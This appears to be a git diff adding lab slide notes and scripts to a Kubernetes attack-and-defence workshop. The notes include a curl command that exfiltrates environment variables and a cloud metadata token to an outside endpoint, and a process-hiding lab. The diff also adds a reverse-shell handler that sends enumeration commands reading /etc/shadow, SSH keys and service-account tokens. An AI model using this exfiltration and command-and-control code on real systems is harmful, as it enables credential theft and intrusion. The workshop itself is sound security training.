+ curl -s -X POST -A "${UA}" -H "X-User: ${HANDLE}" -H "Cookie: `uname -a | gzip | base64 -w0`" -d \
+`{ env && curl -s -H 'Metadata-Flavor:Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token; } | gzip | openssl enc -e -aes-256-cbc -md sha512 -pbkdf2 -salt -a -pass "pass:${PW}" | base64 -w0` \
+$URL
+ echo
+ done
+fi
+```
+
+This adds a little more data to our exfil, we'll go over this.
+
+> After pasting, hit `[ESC]`, then type `:wq`
+
+### Slide 164 - Libprocess hider lab (cont.)
+
+>`[ESC]` then type `:wq` if you haven't already from last slide
+
+Rebuild the container
+```
+docker build -t cmddemo .
+```
+
+Run the container in the background(detached) and just give us the container id (`-d` aka `--detach`)
+```
+docker run -d cmddemo
+```
+
+After 30 seconds, you should see a new request on your Pipedream endpoint (that hopefully you kept open). If not, create a new endpoint on Pipedream, re-edit your Dockerfile, replace the environment variable value with the new one, rebuild, and re-run the container.
+
+### Slide 165 - Libprocess hider lab (cont.)
+
+Decrypt and decode the new data in the raw output of the Pipedream request that came in. Replace `[DATA]` with the base64 string from it in the command below. Don't forget to replace `[strong password]` in the command below with the one you set in the Dockerfile.
+
+Enter these commands below as three separate lines, do not hit `[ENTER]` until you've replaced the `[DATA]` and the password.
+** use the clipboard function for these comands with newline `\` otherwise it'll hit return before you're ready. **
+
+```
+base64 -d <<< [DATA] \
+```
+```
+| openssl enc -d -aes-256-cbc -md sha512 -pbkdf2 -a -salt -pass "pass:[strong password]" \
+```
+```
+| gunzip
+```
+
+What do you see? Why would this information be useful to an attacker?
+
+Let's test out the libprocesshider
+
+```
+docker ps
+```
+Use id/name in to replace `[container name/id]` in command below
+```
+docker exec [container name/id] ps auxf
+```
+Where's the sleep process?
+
+Run the process list outside the container/namespace.
+```
+ps auxf |grep systemd
+```
+There it is, why isn't it hiding the process outside the namespace?
+
+Stop the container (running in background) now that we're done with it.
+```
+docker stop [container name/id]
+```
+
+
+### Slide 178 - Complex Microservices app demo
+
+You can run this in your lab cluster.
+
+```
+kubectl create -f https://raw.githubusercontent.com/microservices-demo/microservices-demo/master/deploy/kubernetes/complete-demo.yaml
+```
+
+```
+kubectl get deployments -n sock-shop
+```
+
+```
+kubectl get replicasets -n sock-shop
+```
+
+### Slide XXX - Accessing services running in containers
+
+Start up web service, but don't expose externally (e.g. `-p 80:80`), only expose locally on bridge interface
+
+```
+docker run --name=netwebserver -d nginx
+```
+
+Get the IP of the bridge interface
+
+```
+docker inspect -f "{{ .NetworkSettings.IPAddress }}" netwebserver
+```
+
+Access service from host machine thru bridge interface
+
+```
+curl http://[IP]
+```
+
+Clean up
+
+```
+docker stop netwebserver
+```
+
+### Slide XXX - Incident response exercise
+
+```
+openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj "/C=XX/ST=AZ/L=Mesa/O=CactusCon/OU=Malicious Kubernetes/CN=localhost"
+```
+
+```
+python scripts/reverse_shell_handler.py
+```
+
+In another window/terminal, run:
+```
+kubectl apply -f k8s-manifests/attacker-pod.yaml
+```
+
+### Slide XXX - Create side-car pod, test nginx, and remove pod (run in conjunction with babby's first pod
+
+```
+kubectl run -it shell-container --image=alpine/curl:8.11.1 /bin/ash --namespace lab-namespace
+```
+
+Get IP from pod description
+
+```
+curl http:\\[IP]
+```
+
+```
+exit
+```
+
+```
+kubectl delete pod shell-container --namespace lab-namespace
+```
+
+
+### Slide XXX - Using curl to interact with Kubernetes API Server
+
+Kubernetes mounts the token info for service accounts inside container to make them available for use
+
+```
+kubectl run -it shell-container --image=alpine/curl:8.11.1 /bin/ash --namespace lab-namespace
+```
+
+From inside a container in a pod with attached service account
+
+```
+cd /run/secrets/kubernetes.io/serviceaccount && ls -l
+```
+
+Set the namespace as well
+```
+NAMESPACE=lab-namespace
+```
+
+Optionally: Assign the token to variable for later
+```
+TOKEN=$(cat token)
+```
+
+
+or use some other tool to do the curl request below:
+
+```
+curl --cacert ca.crt \
+-H "Authorization: Bearer $(cat token)" \
+https://kubernetes.default.svc/api/v1/namespaces/$NAMESPACE/pods
+```
+
+ca.crt, etc are all provided in the /run/secrets/kubernetes.io/serviceaccount directory. We read token straight from the file and inserted it in the curl command above. Likewise, Kubernetes internal DNS resolves kubernetes.default.svc to the API server IP for you.
+
+You'll get a JSON response back that you can parse yourself.
+
+Likely it was a forbidden response.
+
+But it did tell you what rights you need. We could create a whole new service account and assign that to the pod (proper way) but to save time, can just give rights
+to the current account. Open a new terminal to the server.
+
+```
+kubectl create role pod-reader --verb=get --verb=list --verb=watch --resource=pods --namespace lab-namespace
+```
+
+```
+kubectl create rolebinding lab-namespace-default-pod-reader --role pod-reader --serviceaccount=lab-namespace:default --namespace lab-namespace
+```
+
+Exit/close this window. Back in the other window:
+
+```
+kubectl attach shell-container -c shell-container -i -t -n lab-namespace
+```
+
+```
+cd /run/secrets/kubernetes.io/serviceaccount && NAMESPACE=lab-namespace
+```
+
+```
+curl --cacert ca.crt \
+-H "Authorization: Bearer $(cat token)" \
+https://kubernetes.default.svc/api/v1/namespaces/$NAMESPACE/pods
+```
+
+Now you should see a full response, at least including the pod you're running in.
+
+You can exit the pod and if you want to clean up delete the shell-container pod.
+
+```
+kubectl delete pod shell-container -n lab-namespace
+```
diff --git a/current/scripts/reverse_shell_handler.py b/current/scripts/reverse_shell_handler.py
new file mode 100644
index 0000000..bdfdab0
--- /dev/null
+++ b/current/scripts/reverse_shell_handler.py
@@ -0,0 +1,78 @@
+from twisted.internet import ssl, reactor
+from twisted.internet.protocol import Protocol, Factory
+
+enum_commands = ['whoami','id','hostname','cat /etc/passwd', 'cat /etc/shadow', 'cat /etc/group','ls -l ~/.ssh/','sudo -l','ps aux','uname -a','env','cat /run/secrets/kubernetes.io/serviceaccount/token','cat /var/run/secrets/kubernetes.io/serviceaccount/token','cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt','strace ls']
+# Reverse enumeration commands so that the commands are sent in order when popped off the stack
+enum_commands.reverse()
+
+
+# Twisted is an event-driven networking engine written in Python and licensed under the open source MIT license.
+
+# The Protocol class is the base class for Twisted networking protocols.
+# It defines the basic interface between transports and higher-level protocols.
+# The Protocol class is a subclass of twisted.internet.interfaces.IProtocol.
+# The Protocol class is used to define the behavior of a specific protocol.
+
+# The Protocol class defines the following methods:
+# makeConnection: Called when a connection is made.
+# dataReceived: Called whenever data is received.
+# connectionLost: Called when the connection is shut down.
+
+# See https://twistedmatrix.com/documents/current/api/twisted.internet.protocol.Protocol.html
+# for more information on the Protocol class
+
+
+
+class SSLProtocol(Protocol):
+
+ # initialize the enumeration commands
+
+ def __init__(self):
+ # Make a copy of the enumeration commands
+ self.enum_commands = enum_commands.copy()
+
+ def connectionMade(self):
+ print('Connection made')
+
+
+ def dataReceived(self, data):
+ # print('Received:', data.decode())
+ # Wait for a connection a prompt is received from the client
+ if data.decode() == '$ ' or data.decode().endswith('$ '):
+ # If there are no more enumeration commands, exit
+ if len(self.enum_commands) == 0:
+ self.send_command('exit\n')
+ self.transport.loseConnection()
+ return
+ else:
+ # Send one of the enumeration commands
+ command = self.enum_commands.pop() + '\n'
+ self.send_command(command)
+
+ def send_command(self, command):
+ self.transport.write(command.encode())
+ print('Sent:', command)
+
+class SSLServerFactory(Factory):
+ def buildProtocol(self, addr):
+ return SSLProtocol()
+
+
+
+def main():
+ # Set the server address and port
+ server_address = ('0.0.0.0', 4443)
+ # Load server's certificate and private key
+ with open('cert.pem', 'rb') as cert_file, open('key.pem', 'rb') as key_file:
+ certificate = ssl.PrivateCertificate.loadPEM(cert_file.read() + key_file.read())
+
+ # Create and start SSL server
+ factory = SSLServerFactory()
+ reactor.listenSSL(server_address[1], factory, certificate.options())
+ print(f'SSL server running on {server_address[0]}:{server_address[1]}')
+ reactor.run()
+
+
+if __name__ == "__main__":
+ main()
+
diff --git a/current/scripts/verify-setup.sh b/current/scripts/verify-setup.sh
new file mode 100644
index 0000000..4ccf8c5
--- /dev/null
+++ b/current/scripts/verify-setup.sh
@@ -0,0 +1,216 @@
+#!/usr/bin/env bash
+# verify-setup.sh - Smoke test script for Malicious Kubernetes Workshop lab setup
+# Run this after completing lab setup to verify all tools and services are working.
+
+set -euo pipefail
+
+RED='\033[0;31m'
+GREEN='\033[0;32m'
+YELLOW='\033[1;33m'
+NC='\033[0m' # No Color
+
+PASS=0
+FAIL=0
+WARN=0
+
+pass() {
+ echo -e " ${GREEN}[PASS]${NC} $1"
+ ((PASS++))
+}
+
+fail() {
+ echo -e " ${RED}[FAIL]${NC} $1"
+ ((FAIL++))
+}
+
+warn() {
+ echo -e " ${YELLOW}[WARN]${NC} $1"
+ ((WARN++))
+}
+
+check_command() {
+ local cmd=$1
+ local expected_version=${2:-""}
+ if command -v "$cmd" &> /dev/null; then
+ local version
+ version=$("$cmd" version 2>/dev/null | head -1 || "$cmd" --version 2>/dev/null | head -1 || echo "installed")
+ if [ -n "$expected_version" ]; then
+ if echo "$version" | grep -q "$expected_version"; then
+ pass "$cmd ($version)"
+ else
+ warn "$cmd installed but version mismatch (got: $version, expected: $expected_version)"
+ fi
+ else
+ pass "$cmd ($version)"
+ fi
+ else
+ fail "$cmd not found in PATH"
+ fi
+}
+
+echo "=========================================="
+echo " Malicious Kubernetes Workshop"
+echo " Setup Verification"
+echo "=========================================="
+echo ""
+
+# --- Section 1: Core Tools ---
+echo "--- Core Tools ---"
+check_command docker
+check_command kubectl "v1.31"
+check_command kind "v0.27"
+check_command helm "v3.16"
+check_command ansible
+check_command jq
+check_command ngrok
+
+# --- Section 2: Supply Chain Tools ---
+echo ""
+echo "--- Supply Chain Tools ---"
+check_command cosign
+check_command crane
+check_command syft
+check_command grype
+
+# --- Section 3: Docker ---
+echo ""
+echo "--- Docker ---"
+if docker info &> /dev/null; then
+ pass "Docker daemon is running"
+else
+ fail "Docker daemon is not running (try: sudo systemctl start docker)"
+fi
+
+if groups | grep -q docker; then
+ pass "Current user is in docker group"
+else
+ warn "Current user is NOT in docker group (you may need sudo for docker commands)"
+fi
+
+# --- Section 4: Kind Cluster ---
+echo ""
+echo "--- Kind Cluster ---"
+if kind get clusters 2>/dev/null | grep -q "lab"; then
+ pass "Kind cluster 'lab' exists"
+else
+ warn "Kind cluster 'lab' not found (run: kind create cluster --config=kind-lab-config.yaml)"
+fi
+
+if kubectl cluster-info --context kind-lab &> /dev/null; then
+ pass "kubectl can reach kind-lab cluster"
+
+ # Check nodes
+ NODE_COUNT=$(kubectl get nodes --no-headers 2>/dev/null | wc -l)
+ if [ "$NODE_COUNT" -ge 3 ]; then
+ pass "Cluster has $NODE_COUNT nodes (expected 3: 1 control-plane + 2 workers)"
+ else
+ warn "Cluster has $NODE_COUNT nodes (expected 3)"
+ fi
+
+ # --- Section 5: K8s Resources ---
+ echo ""
+ echo "--- K8s Resources ---"
+ if kubectl get namespace pls-dont-hack-me &> /dev/null; then
+ pass "Namespace 'pls-dont-hack-me' exists"
+ else
+ warn "Namespace 'pls-dont-hack-me' not found (run: ansible-playbook k8s-ansible-setup.yaml)"
+ fi
+
+ if kubectl get namespace monitoring &> /dev/null; then
+ pass "Namespace 'monitoring' exists"
+ else
+ warn "Namespace 'monitoring' not found"
+ fi
+
+ if kubectl get namespace tracee-system &> /dev/null; then
+ pass "Namespace 'tracee-system' exists"
+ else
+ warn "Namespace 'tracee-system' not found"
+ fi
+
+ # --- Section 6: Helm Releases ---
+ echo ""
+ echo "--- Helm Releases ---"
+ for release in kind-prometheus promtail loki tracee; do
+ if helm list --all-namespaces 2>/dev/null | grep -q "$release"; then
+ pass "Helm release '$release' is deployed"
+ else
+ warn "Helm release '$release' not found"
+ fi
+ done
+
+ for release in falco tetragon; do
+ if helm list --all-namespaces 2>/dev/null | grep -q "$release"; then
+ pass "Helm release '$release' is deployed"
+ else
+ warn "Helm release '$release' not found (new tool — run k8s-ansible-setup if not yet deployed)"
+ fi
+ done
+
+ # --- Section 7: Key Pods ---
+ echo ""
+ echo "--- Key Pods ---"
+ if kubectl get pods -n monitoring --no-headers 2>/dev/null | grep -q "Running"; then
+ pass "Monitoring pods are running"
+ else
+ warn "No running pods in monitoring namespace"
+ fi
+
+ if kubectl get pods -n tracee-system --no-headers 2>/dev/null | grep -q "Running"; then
+ pass "Tracee pods are running"
+ else
+ warn "Tracee pods not running"
+ fi
+
+ # --- Section 8: Developer Context ---
+ echo ""
+ echo "--- Contexts ---"
+ if kubectl config get-contexts 2>/dev/null | grep -q "developer@kind-lab"; then
+ pass "Developer context configured"
+ else
+ warn "Developer context not configured (set up by k8s-ansible-setup)"
+ fi
+else
+ warn "Cannot reach kind-lab cluster (cluster may not be created yet)"
+fi
+
+# --- Section 9: Container Image Pull Test ---
+echo ""
+echo "--- Image Pull Test ---"
+for image in "ubuntu:22.04" "alpine/curl:8.11.1" "bkimminich/juice-shop"; do
+ if docker pull "$image" &> /dev/null; then
+ pass "Can pull $image"
+ else
+ fail "Cannot pull $image"
+ fi
+done
+
+# --- Section 10: ngrok ---
+echo ""
+echo "--- ngrok ---"
+if ngrok config check &> /dev/null 2>&1; then
+ pass "ngrok config is valid"
+else
+ if [ -f "$HOME/.config/ngrok/ngrok.yml" ] || [ -f "$HOME/.ngrok2/ngrok.yml" ]; then
+ pass "ngrok config file exists"
+ else
+ warn "ngrok authtoken not configured (run: ngrok config add-authtoken )"
+ fi
+fi
+
+# --- Summary ---
+echo ""
+echo "=========================================="
+echo " Results: ${GREEN}${PASS} passed${NC}, ${RED}${FAIL} failed${NC}, ${YELLOW}${WARN} warnings${NC}"
+echo "=========================================="
+
+if [ "$FAIL" -gt 0 ]; then
+ echo -e "${RED}Some checks failed. Review the output above and fix issues before starting the workshop.${NC}"
+ exit 1
+elif [ "$WARN" -gt 0 ]; then
+ echo -e "${YELLOW}Some warnings — the lab may still work, but review the output above.${NC}"
+ exit 0
+else
+ echo -e "${GREEN}All checks passed! Lab is ready.${NC}"
+ exit 0
+fi